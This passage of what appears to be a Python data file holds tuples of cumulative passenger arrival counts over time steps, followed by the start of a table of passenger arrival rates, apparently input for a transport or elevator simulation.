(24, 26, 21, 16, 15, 3, 4, 8, 16, 6, 4, 2, 0, 18, 28, 16, 18, 20, 16, 12, 7, 10, 15, 3, 2, 0), # 9
(26, 34, 25, 18, 16, 7, 4, 10, 17, 6, 4, 3, 0, 20, 31, 17, 19, 21, 16, 13, 7, 11, 15, 3, 2, 0), # 10
(31, 38, 28, 20, 20, 7, 4, 10, 19, 6, 4, 3, 0, 25, 35, 23, 21, 25, 18, 15, 9, 12, 15, 3, 3, 0), # 11
(36, 39, 29, 25, 22, 7, 6, 13, 22, 7, 5, 3, 0, 29, 39, 29, 23, 31, 23, 16, 10, 13, 16, 3, 3, 0), # 12
(41, 44, 32, 28, 24, 9, 8, 13, 23, 7, 5, 3, 0, 31, 41, 32, 24, 31, 25, 16, 10, 13, 17, 3, 5, 0), # 13
(43, 47, 38, 29, 28, 10, 10, 16, 25, 7, 5, 3, 0, 36, 43, 35, 29, 33, 26, 18, 11, 14, 18, 4, 5, 0), # 14
(48, 50, 41, 30, 30, 11, 11, 20, 27, 7, 6, 3, 0, 41, 47, 39, 29, 33, 27, 19, 13, 15, 20, 6, 7, 0), # 15
(54, 53, 44, 35, 31, 14, 13, 22, 29, 8, 6, 3, 0, 43, 50, 40, 32, 36, 29, 21, 13, 17, 21, 8, 7, 0), # 16
(55, 56, 48, 40, 37, 15, 15, 23, 30, 8, 7, 3, 0, 45, 57, 42, 32, 40, 29, 26, 13, 19, 23, 9, 8, 0), # 17
(57, 60, 53, 45, 38, 15, 16, 24, 30, 11, 7, 3, 0, 52, 60, 46, 34, 42, 30, 27, 13, 21, 23, 9, 8, 0), # 18
(59, 64, 58, 46, 40, 16, 16, 27, 33, 11, 7, 4, 0, 54, 62, 52, 37, 45, 31, 27, 13, 23, 23, 10, 8, 0), # 19
(64, 67, 63, 50, 42, 17, 20, 28, 33, 11, 7, 4, 0, 57, 64, 54, 37, 48, 33, 29, 13, 24, 25, 10, 9, 0), # 20
(68, 72, 63, 53, 45, 17, 21, 30, 33, 14, 8, 4, 0, 59, 69, 56, 39, 51, 39, 30, 14, 26, 26, 12, 10, 0), # 21
(70, 73, 68, 57, 51, 18, 22, 32, 34, 17, 9, 6, 0, 61, 74, 62, 45, 53, 39, 31, 15, 28, 26, 13, 10, 0), # 22
(72, 79, 70, 57, 55, 18, 25, 35, 35, 19, 10, 6, 0, 63, 75, 63, 48, 56, 41, 32, 17, 31, 27, 13, 13, 0), # 23
(74, 83, 72, 60, 58, 20, 26, 37, 35, 20, 11, 6, 0, 66, 78, 63, 53, 61, 41, 35, 17, 32, 28, 16, 13, 0), # 24
(81, 87, 75, 60, 59, 23, 26, 38, 37, 20, 11, 6, 0, 75, 85, 67, 54, 66, 44, 37, 18, 35, 28, 18, 13, 0), # 25
(88, 91, 81, 63, 65, 26, 29, 38, 38, 21, 13, 6, 0, 78, 91, 69, 59, 71, 48, 38, 19, 37, 29, 20, 15, 0), # 26
(91, 97, 84, 64, 67, 30, 30, 39, 43, 21, 14, 6, 0, 85, 95, 72, 60, 75, 49, 38, 19, 39, 31, 20, 15, 0), # 27
(98, 99, 87, 65, 68, 30, 34, 41, 45, 22, 15, 6, 0, 92, 99, 73, 62, 77, 50, 41, 19, 43, 31, 20, 16, 0), # 28
(104, 104, 90, 70, 70, 31, 35, 42, 45, 23, 16, 6, 0, 95, 104, 78, 63, 79, 53, 42, 20, 47, 32, 21, 16, 0), # 29
(109, 108, 94, 74, 76, 33, 39, 44, 47, 23, 17, 6, 0, 100, 107, 81, 66, 82, 53, 48, 22, 48, 32, 21, 16, 0), # 30
(112, 113, 100, 78, 82, 35, 40, 45, 47, 23, 18, 6, 0, 102, 111, 84, 66, 86, 56, 49, 25, 50, 33, 21, 17, 0), # 31
(114, 121, 103, 78, 89, 38, 41, 47, 49, 24, 19, 6, 0, 106, 113, 86, 71, 89, 57, 50, 25, 51, 33, 23, 17, 0), # 32
(115, 123, 105, 81, 93, 39, 45, 49, 53, 27, 22, 6, 0, 107, 119, 93, 73, 91, 60, 51, 25, 53, 35, 24, 17, 0), # 33
(120, 125, 108, 83, 97, 40, 47, 50, 55, 27, 22, 7, 0, 113, 122, 96, 75, 94, 64, 53, 27, 56, 35, 24, 17, 0), # 34
(123, 128, 113, 85, 103, 41, 49, 51, 56, 27, 23, 8, 0, 115, 125, 98, 77, 97, 67, 54, 28, 57, 36, 24, 19, 0), # 35
(128, 133, 118, 89, 107, 43, 50, 55, 58, 27, 23, 8, 0, 119, 128, 100, 79, 100, 68, 57, 28, 58, 36, 24, 19, 0), # 36
(134, 138, 122, 92, 108, 46, 51, 57, 61, 27, 24, 8, 0, 121, 131, 103, 81, 100, 71, 58, 29, 61, 37, 24, 20, 0), # 37
(136, 143, 126, 97, 108, 49, 53, 57, 61, 31, 24, 8, 0, 127, 136, 105, 83, 101, 73, 59, 29, 65, 38, 25, 20, 0), # 38
(138, 147, 129, 102, 110, 50, 53, 58, 61, 32, 25, 9, 0, 129, 139, 105, 87, 102, 75, 60, 30, 66, 41, 25, 20, 0), # 39
(143, 149, 135, 107, 113, 51, 55, 59, 64, 32, 25, 9, 0, 136, 144, 109, 87, 106, 75, 61, 32, 67, 41, 28, 22, 0), # 40
(144, 153, 139, 111, 116, 54, 59, 59, 65, 33, 25, 9, 0, 141, 147, 110, 89, 109, 76, 63, 34, 69, 44, 29, 23, 0), # 41
(147, 154, 144, 116, 120, 55, 63, 61, 68, 34, 25, 9, 0, 146, 149, 114, 91, 109, 79, 65, 34, 71, 46, 29, 23, 0), # 42
(149, 156, 147, 121, 121, 58, 66, 62, 68, 34, 26, 10, 0, 148, 151, 116, 96, 114, 82, 66, 34, 72, 47, 30, 23, 0), # 43
(153, 159, 149, 127, 129, 60, 70, 62, 71, 36, 26, 10, 0, 154, 155, 118, 100, 118, 82, 68, 34, 73, 49, 31, 23, 0), # 44
(153, 169, 150, 130, 131, 60, 71, 62, 71, 37, 27, 10, 0, 158, 160, 119, 101, 121, 85, 68, 34, 74, 50, 31, 23, 0), # 45
(158, 170, 154, 133, 134, 61, 71, 63, 73, 38, 27, 10, 0, 161, 160, 123, 102, 123, 87, 69, 34, 80, 50, 32, 23, 0), # 46
(161, 173, 157, 138, 136, 61, 72, 67, 75, 39, 27, 10, 0, 163, 163, 128, 105, 127, 91, 71, 34, 83, 50, 32, 23, 0), # 47
(168, 175, 162, 139, 138, 62, 74, 68, 76, 42, 27, 10, 0, 168, 168, 129, 107, 131, 96, 72, 35, 85, 53, 33, 23, 0), # 48
(173, 177, 167, 140, 140, 64, 76, 70, 79, 44, 27, 10, 0, 172, 173, 129, 108, 132, 99, 74, 35, 87, 55, 34, 23, 0), # 49
(175, 182, 169, 146, 144, 67, 76, 70, 81, 45, 28, 10, 0, 178, 173, 132, 110, 133, 101, 76, 35, 89, 56, 35, 23, 0), # 50
(179, 184, 175, 149, 145, 68, 78, 70, 84, 45, 28, 11, 0, 179, 174, 134, 114, 139, 102, 76, 35, 90, 58, 35, 23, 0), # 51
(183, 189, 181, 153, 149, 68, 78, 72, 86, 47, 28, 11, 0, 181, 176, 135, 117, 141, 104, 79, 36, 91, 61, 37, 23, 0), # 52
(188, 192, 183, 155, 150, 69, 82, 74, 89, 47, 28, 11, 0, 191, 182, 135, 118, 142, 104, 79, 36, 95, 63, 38, 24, 0), # 53
(190, 198, 186, 160, 154, 72, 82, 76, 89, 47, 28, 11, 0, 194, 189, 139, 119, 144, 107, 80, 36, 98, 64, 39, 24, 0), # 54
(194, 206, 186, 162, 159, 72, 85, 79, 93, 47, 29, 11, 0, 196, 193, 143, 120, 146, 107, 80, 37, 100, 65, 39, 24, 0), # 55
(199, 210, 191, 165, 163, 72, 85, 80, 94, 47, 29, 12, 0, 198, 195, 146, 122, 149, 108, 82, 38, 103, 65, 40, 24, 0), # 56
(203, 213, 196, 169, 164, 74, 85, 82, 94, 47, 29, 12, 0, 204, 197, 150, 125, 152, 112, 87, 39, 104, 65, 40, 24, 0), # 57
(205, 219, 200, 175, 167, 76, 85, 83, 99, 47, 30, 13, 0, 206, 201, 151, 126, 157, 113, 87, 41, 106, 67, 40, 24, 0), # 58
(207, 221, 201, 176, 171, 76, 89, 84, 102, 48, 31, 13, 0, 212, 207, 152, 128, 161, 116, 88, 41, 106, 69, 41, 25, 0), # 59
(211, 222, 207, 178, 174, 76, 89, 84, 105, 48, 32, 13, 0, 216, 209, 155, 130, 162, 118, 89, 41, 107, 72, 43, 25, 0), # 60
(218, 225, 209, 183, 178, 77, 91, 84, 106, 49, 32, 13, 0, 219, 211, 158, 137, 164, 119, 89, 41, 108, 74, 43, 25, 0), # 61
(223, 227, 211, 186, 180, 77, 91, 85, 108, 51, 34, 13, 0, 223, 218, 159, 142, 169, 122, 89, 42, 111, 75, 45, 26, 0), # 62
(228, 230, 212, 191, 182, 79, 91, 86, 109, 51, 36, 13, 0, 229, 223, 165, 147, 171, 123, 89, 43, 113, 76, 45, 26, 0), # 63
(229, 233, 216, 193, 185, 79, 95, 87, 109, 51, 36, 14, 0, 233, 229, 165, 149, 172, 123, 92, 45, 115, 77, 45, 26, 0), # 64
(236, 240, 220, 196, 191, 81, 95, 89, 109, 51, 36, 14, 0, 236, 233, 170, 149, 176, 126, 93, 46, 116, 78, 45, 26, 0), # 65
(239, 246, 220, 198, 194, 82, 97, 91, 111, 51, 36, 15, 0, 247, 236, 173, 150, 182, 128, 95, 46, 117, 80, 46, 26, 0), # 66
(243, 247, 223, 200, 196, 85, 99, 92, 113, 53, 37, 15, 0, 252, 237, 176, 155, 185, 128, 96, 48, 119, 81, 46, 27, 0), # 67
(249, 252, 225, 203, 200, 90, 100, 96, 115, 53, 38, 15, 0, 255, 241, 177, 157, 187, 129, 98, 49, 121, 83, 46, 27, 0), # 68
(252, 253, 232, 206, 203, 93, 100, 96, 115, 53, 38, 15, 0, 257, 246, 179, 162, 189, 129, 101, 50, 124, 85, 47, 27, 0), # 69
(254, 259, 235, 209, 208, 94, 101, 98, 116, 55, 38, 15, 0, 260, 254, 180, 165, 192, 129, 104, 50, 126, 86, 47, 27, 0), # 70
(254, 262, 239, 211, 213, 96, 102, 98, 117, 55, 38, 15, 0, 264, 260, 182, 171, 200, 130, 105, 51, 127, 86, 47, 27, 0), # 71
(255, 266, 242, 214, 213, 97, 102, 99, 120, 55, 39, 15, 0, 269, 267, 186, 172, 203, 131, 105, 51, 130, 89, 48, 27, 0), # 72
(259, 270, 245, 218, 215, 99, 103, 101, 123, 56, 39, 15, 0, 271, 270, 188, 173, 205, 133, 106, 51, 131, 90, 49, 27, 0), # 73
(261, 273, 246, 221, 218, 101, 105, 101, 126, 56, 40, 15, 0, 272, 275, 189, 175, 207, 134, 107, 51, 131, 90, 49, 27, 0), # 74
(264, 278, 247, 225, 221, 102, 107, 102, 127, 56, 40, 16, 0, 274, 278, 191, 178, 211, 139, 107, 52, 132, 90, 49, 27, 0), # 75
(268, 280, 247, 229, 222, 103, 110, 105, 131, 56, 40, 17, 0, 283, 281, 192, 181, 214, 140, 110, 53, 132, 92, 50, 27, 0), # 76
(271, 285, 251, 231, 228, 103, 113, 105, 134, 56, 41, 17, 0, 286, 286, 194, 182, 218, 142, 112, 54, 133, 93, 51, 28, 0), # 77
(274, 286, 254, 235, 231, 104, 113, 107, 135, 57, 42, 17, 0, 288, 289, 199, 184, 221, 143, 114, 55, 136, 95, 52, 29, 0), # 78
(281, 291, 259, 239, 235, 105, 115, 107, 137, 57, 43, 17, 0, 293, 296, 206, 186, 224, 145, 116, 55, 137, 96, 52, 29, 0), # 79
(284, 298, 264, 242, 237, 106, 115, 108, 137, 57, 43, 17, 0, 296, 299, 210, 186, 225, 148, 119, 56, 140, 97, 52, 29, 0), # 80
(291, 300, 268, 250, 239, 110, 116, 110, 138, 58, 44, 18, 0, 299, 304, 213, 188, 231, 149, 121, 57, 143, 97, 53, 29, 0), # 81
(299, 306, 272, 253, 243, 110, 119, 113, 141, 58, 44, 18, 0, 303, 308, 214, 190, 232, 149, 123, 59, 145, 98, 54, 29, 0), # 82
(303, 308, 274, 257, 244, 111, 122, 114, 141, 61, 46, 19, 0, 307, 315, 217, 190, 236, 150, 124, 59, 146, 101, 54, 30, 0), # 83
(306, 313, 275, 262, 248, 114, 124, 114, 143, 62, 47, 19, 0, 314, 320, 220, 195, 238, 150, 126, 59, 147, 103, 54, 30, 0), # 84
(308, 314, 278, 266, 249, 114, 125, 115, 143, 63, 48, 19, 0, 316, 325, 223, 197, 240, 151, 127, 60, 149, 104, 55, 30, 0), # 85
(312, 317, 281, 271, 256, 114, 126, 116, 146, 65, 48, 19, 0, 319, 330, 226, 199, 243, 153, 128, 61, 151, 104, 55, 30, 0), # 86
(316, 318, 284, 273, 260, 114, 127, 116, 147, 65, 49, 19, 0, 322, 334, 227, 202, 245, 156, 130, 62, 152, 106, 57, 30, 0), # 87
(318, 322, 289, 275, 262, 114, 128, 116, 147, 65, 50, 19, 0, 329, 336, 227, 206, 248, 156, 131, 62, 152, 106, 59, 30, 0), # 88
(325, 323, 294, 279, 268, 115, 131, 118, 149, 65, 50, 19, 0, 329, 341, 228, 208, 248, 156, 134, 63, 154, 106, 60, 30, 0), # 89
(330, 326, 302, 285, 272, 116, 132, 119, 150, 66, 51, 19, 0, 331, 343, 230, 211, 250, 159, 137, 63, 154, 106, 60, 30, 0), # 90
(336, 331, 307, 291, 273, 118, 132, 120, 152, 66, 51, 20, 0, 336, 347, 234, 211, 251, 161, 137, 63, 157, 108, 60, 30, 0), # 91
(340, 337, 310, 293, 276, 118, 134, 120, 154, 66, 51, 20, 0, 339, 350, 236, 211, 257, 163, 138, 63, 158, 109, 61, 30, 0), # 92
(346, 341, 313, 296, 278, 118, 134, 120, 155, 68, 51, 21, 0, 342, 357, 236, 213, 260, 167, 141, 63, 162, 111, 62, 31, 0), # 93
(349, 342, 315, 299, 279, 119, 136, 121, 156, 68, 52, 21, 0, 348, 360, 238, 215, 265, 167, 141, 63, 164, 111, 63, 31, 0), # 94
(354, 343, 320, 303, 285, 121, 136, 121, 157, 69, 52, 21, 0, 351, 362, 241, 221, 267, 167, 141, 63, 164, 112, 63, 31, 0), # 95
(358, 346, 322, 307, 291, 123, 136, 123, 160, 70, 53, 21, 0, 355, 363, 242, 222, 271, 169, 141, 64, 164, 112, 63, 31, 0), # 96
(361, 349, 329, 309, 294, 124, 138, 124, 162, 71, 53, 21, 0, 359, 365, 246, 223, 274, 169, 142, 64, 164, 113, 63, 31, 0), # 97
(366, 354, 330, 314, 297, 129, 139, 126, 162, 73, 54, 21, 0, 362, 369, 247, 226, 276, 170, 145, 65, 167, 113, 63, 31, 0), # 98
(369, 357, 333, 317, 299, 131, 140, 127, 163, 75, 55, 22, 0, 363, 371, 249, 228, 279, 172, 147, 66, 170, 115, 64, 32, 0), # 99
(375, 361, 335, 318, 301, 135, 142, 131, 163, 75, 57, 22, 0, 370, 376, 253, 230, 282, 172, 148, 67, 173, 115, 64, 33, 0), # 100
(380, 363, 336, 320, 306, 136, 143, 133, 166, 76, 58, 23, 0, 371, 379, 255, 233, 284, 175, 151, 67, 175, 115, 64, 34, 0), # 101
(385, 364, 342, 324, 312, 136, 144, 137, 168, 76, 58, 24, 0, 373, 379, 257, 239, 288, 176, 153, 69, 175, 119, 64, 34, 0), # 102
(385, 366, 343, 330, 315, 137, 144, 137, 169, 76, 58, 24, 0, 378, 382, 259, 239, 291, 178, 153, 69, 176, 120, 64, 34, 0), # 103
(387, 367, 345, 335, 317, 137, 145, 139, 169, 77, 58, 24, 0, 378, 386, 260, 241, 293, 179, 156, 69, 178, 123, 65, 34, 0), # 104
(389, 374, 348, 341, 318, 139, 146, 143, 172, 78, 58, 24, 0, 380, 389, 263, 242, 299, 184, 158, 71, 179, 124, 67, 34, 0), # 105
(396, 378, 351, 346, 322, 141, 146, 143, 174, 78, 58, 24, 0, 385, 392, 264, 244, 304, 184, 161, 72, 182, 124, 69, 34, 0), # 106
(400, 382, 357, 350, 322, 141, 148, 146, 175, 78, 58, 24, 0, 388, 399, 265, 246, 306, 186, 161, 75, 182, 125, 70, 34, 0), # 107
(402, 384, 360, 351, 330, 142, 149, 147, 176, 78, 58, 25, 0, 393, 402, 266, 247, 312, 186, 162, 76, 185, 126, 71, 34, 0), # 108
(406, 388, 362, 354, 333, 143, 150, 147, 176, 79, 58, 26, 0, 400, 407, 267, 247, 313, 186, 164, 77, 187, 127, 72, 35, 0), # 109
(411, 392, 363, 359, 335, 143, 150, 149, 177, 79, 58, 26, 0, 406, 408, 270, 247, 315, 188, 165, 77, 187, 127, 73, 35, 0), # 110
(419, 393, 365, 360, 338, 144, 151, 149, 179, 79, 59, 26, 0, 409, 411, 272, 250, 319, 189, 165, 77, 189, 129, 73, 35, 0), # 111
(423, 397, 370, 361, 341, 145, 154, 150, 179, 79, 60, 26, 0, 413, 417, 273, 253, 325, 191, 166, 77, 190, 130, 73, 35, 0), # 112
(426, 399, 372, 364, 344, 147, 155, 152, 181, 79, 61, 26, 0, 416, 422, 274, 254, 328, 192, 169, 78, 191, 132, 74, 36, 0), # 113
(428, 402, 375, 366, 346, 147, 156, 152, 184, 81, 61, 26, 0, 418, 425, 276, 255, 329, 193, 172, 80, 193, 132, 74, 36, 0), # 114
(430, 406, 377, 370, 348, 151, 158, 155, 185, 82, 62, 26, 0, 421, 429, 278, 255, 330, 194, 172, 80, 193, 134, 74, 36, 0), # 115
(434, 407, 382, 373, 350, 154, 162, 157, 188, 82, 63, 27, 0, 427, 433, 280, 257, 331, 195, 172, 81, 195, 134, 74, 38, 0), # 116
(437, 411, 387, 376, 353, 155, 165, 157, 191, 83, 65, 27, 0, 430, 436, 281, 258, 332, 197, 174, 82, 196, 134, 75, 38, 0), # 117
(440, 414, 387, 377, 354, 156, 167, 157, 195, 84, 66, 28, 0, 435, 438, 288, 259, 333, 199, 174, 84, 200, 134, 76, 38, 0), # 118
(443, 417, 387, 379, 358, 157, 169, 158, 198, 84, 66, 29, 0, 439, 442, 288, 261, 334, 200, 174, 85, 200, 134, 77, 38, 0), # 119
(445, 418, 390, 386, 362, 159, 170, 159, 200, 87, 66, 29, 0, 442, 444, 292, 262, 336, 201, 176, 85, 203, 134, 78, 38, 0), # 120
(450, 422, 392, 389, 364, 160, 171, 162, 202, 87, 67, 29, 0, 446, 449, 294, 264, 339, 202, 178, 85, 203, 135, 78, 39, 0), # 121
(452, 425, 395, 391, 364, 162, 171, 162, 205, 88, 67, 30, 0, 449, 454, 295, 265, 339, 203, 180, 86, 204, 136, 78, 40, 0), # 122
(457, 427, 398, 395, 368, 162, 172, 163, 207, 88, 67, 30, 0, 450, 456, 298, 266, 340, 203, 180, 89, 206, 137, 78, 40, 0), # 123
(460, 429, 401, 397, 369, 164, 175, 166, 210, 90, 67, 31, 0, 456, 460, 299, 267, 340, 203, 181, 92, 209, 137, 78, 40, 0), # 124
(463, 431, 404, 400, 370, 164, 177, 168, 212, 90, 67, 31, 0, 460, 466, 300, 269, 346, 206, 182, 93, 210, 138, 79, 40, 0), # 125
(464, 435, 408, 405, 376, 164, 178, 168, 213, 90, 68, 31, 0, 460, 467, 301, 271, 353, 208, 184, 93, 211, 139, 79, 40, 0), # 126
(468, 436, 412, 406, 378, 164, 180, 168, 214, 90, 71, 31, 0, 462, 470, 306, 271, 356, 210, 184, 93, 212, 140, 79, 40, 0), # 127
(471, 438, 415, 408, 379, 165, 181, 168, 215, 90, 71, 31, 0, 464, 472, 307, 272, 360, 211, 185, 95, 213, 144, 81, 40, 0), # 128
(478, 438, 419, 413, 380, 167, 181, 169, 216, 90, 71, 31, 0, 467, 473, 309, 273, 361, 212, 185, 97, 213, 144, 82, 41, 0), # 129
(479, 439, 421, 415, 385, 170, 182, 170, 218, 91, 71, 31, 0, 472, 475, 310, 273, 366, 213, 186, 100, 214, 146, 83, 42, 0), # 130
(484, 441, 429, 416, 386, 172, 182, 171, 218, 91, 72, 32, 0, 475, 480, 311, 277, 372, 214, 190, 100, 215, 146, 83, 42, 0), # 131
(486, 443, 432, 420, 389, 172, 183, 172, 221, 93, 73, 32, 0, 479, 485, 313, 277, 373, 216, 192, 100, 215, 146, 83, 42, 0), # 132
(490, 447, 434, 424, 390, 173, 183, 173, 221, 93, 74, 32, 0, 481, 487, 315, 278, 376, 216, 193, 101, 215, 147, 85, 43, 0), # 133
(492, 449, 435, 428, 396, 173, 183, 175, 223, 94, 77, 32, 0, 485, 489, 316, 279, 379, 217, 193, 101, 217, 147, 85, 43, 0), # 134
(493, 451, 438, 431, 401, 173, 184, 177, 223, 96, 78, 32, 0, 487, 492, 320, 282, 380, 217, 195, 102, 220, 148, 86, 43, 0), # 135
(499, 455, 444, 433, 404, 176, 185, 178, 224, 97, 78, 32, 0, 491, 496, 324, 283, 383, 219, 197, 104, 223, 152, 86, 43, 0), # 136
(504, 456, 447, 436, 407, 178, 186, 179, 227, 97, 79, 33, 0, 496, 500, 326, 285, 385, 224, 200, 105, 224, 153, 88, 44, 0), # 137
(510, 457, 451, 437, 410, 182, 188, 181, 227, 99, 79, 33, 0, 499, 503, 326, 285, 387, 225, 200, 105, 224, 154, 88, 44, 0), # 138
(513, 460, 454, 440, 412, 186, 188, 181, 229, 99, 80, 33, 0, 502, 504, 327, 286, 390, 226, 200, 106, 225, 156, 88, 44, 0), # 139
(519, 466, 460, 445, 417, 186, 189, 182, 230, 99, 80, 33, 0, 503, 507, 329, 288, 394, 230, 201, 106, 227, 157, 88, 44, 0), # 140
(523, 470, 462, 449, 420, 186, 190, 184, 231, 100, 80, 34, 0, 506, 512, 330, 288, 402, 231, 203, 106, 228, 158, 89, 44, 0), # 141
(525, 473, 464, 452, 426, 188, 191, 185, 232, 101, 80, 35, 0, 512, 514, 332, 290, 404, 237, 205, 106, 232, 160, 91, 44, 0), # 142
(527, 475, 466, 456, 429, 189, 192, 186, 233, 101, 82, 35, 0, 517, 517, 335, 290, 405, 238, 207, 107, 235, 162, 92, 44, 0), # 143
(530, 475, 468, 460, 433, 190, 195, 187, 233, 101, 82, 36, 0, 521, 519, 335, 291, 406, 239, 208, 109, 235, 163, 92, 44, 0), # 144
(534, 476, 471, 461, 438, 190, 197, 191, 234, 102, 82, 36, 0, 528, 525, 337, 292, 408, 240, 208, 109, 235, 163, 92, 44, 0), # 145
(538, 480, 474, 464, 441, 193, 197, 192, 235, 102, 82, 36, 0, 533, 525, 339, 292, 410, 241, 210, 109, 236, 165, 92, 44, 0), # 146
(540, 481, 476, 465, 444, 194, 198, 193, 236, 102, 82, 36, 0, 539, 528, 341, 292, 412, 241, 211, 109, 238, 166, 93, 44, 0), # 147
(545, 486, 479, 469, 444, 200, 198, 193, 238, 103, 83, 37, 0, 548, 530, 342, 293, 413, 241, 212, 109, 238, 167, 93, 45, 0), # 148
(548, 491, 485, 473, 450, 202, 198, 196, 241, 103, 83, 38, 0, 551, 531, 346, 293, 418, 242, 214, 109, 240, 168, 97, 45, 0), # 149
(552, 491, 488, 474, 453, 203, 200, 196, 242, 103, 83, 39, 0, 554, 533, 348, 293, 423, 242, 215, 109, 240, 168, 98, 45, 0), # 150
(558, 496, 492, 477, 454, 204, 202, 196, 242, 103, 83, 39, 0, 556, 534, 348, 293, 431, 242, 215, 112, 240, 168, 102, 45, 0), # 151
(558, 497, 493, 481, 454, 204, 203, 196, 242, 105, 83, 39, 0, 559, 536, 351, 293, 433, 242, 215, 112, 246, 168, 103, 45, 0), # 152
(562, 497, 498, 482, 460, 205, 205, 198, 244, 105, 83, 39, 0, 561, 542, 352, 294, 434, 242, 215, 112, 248, 168, 103, 45, 0), # 153
(566, 498, 501, 484, 461, 206, 205, 199, 246, 106, 83, 40, 0, 565, 545, 353, 295, 436, 243, 215, 114, 249, 168, 105, 46, 0), # 154
(570, 500, 504, 487, 467, 209, 207, 200, 246, 106, 83, 40, 0, 569, 545, 353, 298, 436, 245, 216, 115, 250, 168, 106, 46, 0), # 155
(575, 501, 505, 491, 471, 210, 209, 203, 246, 106, 83, 40, 0, 570, 546, 354, 299, 438, 246, 217, 115, 251, 168, 106, 46, 0), # 156
(579, 502, 508, 494, 475, 213, 212, 204, 247, 108, 84, 40, 0, 573, 547, 357, 299, 443, 246, 221, 115, 252, 170, 106, 46, 0), # 157
(583, 505, 511, 494, 478, 216, 212, 204, 248, 108, 84, 40, 0, 574, 552, 359, 302, 444, 246, 221, 116, 255, 170, 106, 46, 0), # 158
(587, 509, 513, 497, 479, 219, 213, 205, 249, 109, 84, 40, 0, 577, 555, 363, 303, 446, 251, 221, 119, 255, 170, 106, 46, 0), # 159
(588, 513, 516, 497, 479, 220, 214, 205, 249, 109, 84, 40, 0, 579, 557, 364, 304, 448, 253, 221, 119, 259, 173, 106, 46, 0), # 160
(592, 514, 518, 499, 481, 221, 215, 206, 249, 110, 84, 40, 0, 583, 557, 367, 307, 451, 253, 222, 120, 260, 174, 106, 46, 0), # 161
(594, 515, 523, 499, 484, 223, 216, 206, 252, 110, 85, 40, 0, 586, 558, 369, 307, 455, 254, 223, 120, 260, 177, 106, 46, 0), # 162
(596, 517, 526, 502, 485, 224, 219, 208, 254, 111, 85, 40, 0, 590, 560, 372, 308, 458, 257, 224, 123, 260, 178, 107, 46, 0), # 163
(596, 519, 527, 504, 490, 225, 219, 210, 255, 113, 85, 40, 0, 594, 560, 374, 308, 461, 259, 224, 123, 262, 178, 108, 46, 0), # 164
(598, 520, 529, 509, 492, 228, 219, 210, 255, 115, 85, 40, 0, 596, 560, 374, 308, 462, 262, 224, 123, 264, 179, 109, 47, 0), # 165
(601, 521, 531, 511, 493, 229, 220, 211, 256, 115, 85, 40, 0, 598, 562, 377, 309, 462, 265, 225, 124, 265, 179, 110, 47, 0), # 166
(604, 521, 532, 513, 494, 231, 221, 212, 256, 117, 85, 40, 0, 600, 564, 379, 311, 464, 267, 226, 126, 268, 179, 110, 48, 0), # 167
(605, 522, 532, 514, 494, 231, 221, 212, 256, 118, 86, 40, 0, 607, 564, 382, 314, 466, 267, 229, 126, 268, 180, 110, 48, 0), # 168
(610, 525, 536, 516, 494, 232, 222, 212, 257, 118, 86, 40, 0, 609, 564, 382, 317, 467, 268, 229, 128, 269, 180, 111, 48, 0), # 169
(610, 527, 537, 518, 497, 232, 222, 212, 259, 118, 86, 40, 0, 611, 565, 384, 318, 468, 269, 229, 128, 269, 180, 112, 48, 0), # 170
(615, 532, 539, 521, 498, 233, 222, 213, 259, 118, 86, 40, 0, 613, 569, 384, 318, 468, 269, 230, 128, 269, 180, 113, 48, 0), # 171
(616, 535, 540, 522, 500, 233, 223, 213, 259, 119, 86, 40, 0, 617, 574, 385, 320, 470, 270, 230, 128, 271, 180, 113, 48, 0), # 172
(617, 536, 541, 524, 502, 233, 225, 214, 259, 119, 86, 40, 0, 618, 576, 385, 321, 472, 270, 230, 128, 271, 181, 113, 48, 0), # 173
(620, 538, 543, 525, 503, 235, 226, 215, 260, 119, 86, 40, 0, 622, 578, 388, 322, 474, 273, 230, 129, 271, 181, 113, 48, 0), # 174
(620, 538, 545, 528, 507, 235, 227, 215, 260, 120, 86, 40, 0, 624, 581, 392, 323, 478, 273, 230, 130, 271, 181, 114, 48, 0), # 175
(620, 539, 550, 532, 508, 236, 228, 217, 263, 121, 87, 40, 0, 625, 582, 393, 323, 481, 273, 230, 130, 272, 182, 114, 48, 0), # 176
(621, 541, 553, 535, 509, 237, 228, 218, 264, 122, 87, 40, 0, 625, 583, 393, 323, 484, 276, 230, 134, 273, 182, 114, 48, 0), # 177
(623, 541, 553, 537, 509, 238, 228, 219, 267, 123, 87, 40, 0, 628, 584, 395, 324, 485, 277, 230, 135, 273, 182, 114, 48, 0), # 178
(623, 541, 553, 537, 509, 238, 228, 219, 267, 123, 87, 40, 0, 628, 584, 395, 324, 485, 277, 230, 135, 273, 182, 114, 48, 0), # 179
)
passenger_arriving_rate = (
(2.0083462313487073, 2.025939138554161, 1.7370944098708356, 1.86440033215903, 1.481249495362563, 0.7323528174753792, 0.8292071230747831, 0.7755293621632372, 0.8120132082890676, 0.3958015015522371, 0.2803510109257069, 0.16326383594353913, 0.0, 2.0335520850313453, 1.7959021953789303, 1.4017550546285344, 1.187404504656711, 1.6240264165781353, 1.085741107028532, 0.8292071230747831, 0.5231091553395566, 0.7406247476812815, 0.6214667773863434, 0.34741888197416715, 0.18417628532310557, 0.0), # 0
(2.1417308608079897, 2.159688921186411, 1.851782197110051, 1.987543275982985, 1.5793307566597963, 0.780729502943263, 0.8838937882527388, 0.8265856204842847, 0.8656327101777213, 0.4218980692277151, 0.29887307573040883, 0.17404055536047852, 0.0, 2.1679166589759418, 1.9144461089652633, 1.4943653786520439, 1.265694207683145, 1.7312654203554425, 1.1572198686779986, 0.8838937882527388, 0.5576639306737593, 0.7896653783298981, 0.6625144253276618, 0.3703564394220102, 0.19633535647149197, 0.0), # 1
(2.2746892035918926, 2.292907895993359, 1.9660140951824712, 2.1101963113994384, 1.6770567929999318, 0.8289131933862371, 0.9383637015921409, 0.8774375413174034, 0.9190382409170065, 0.4478913775020547, 0.31732154325175427, 0.18477442173510186, 0.0, 2.301745931283876, 2.03251863908612, 1.586607716258771, 1.3436741325061639, 1.838076481834013, 1.2284125578443648, 0.9383637015921409, 0.5920808524187409, 0.8385283964999659, 0.7033987704664796, 0.3932028190364943, 0.20844617236303267, 0.0), # 2
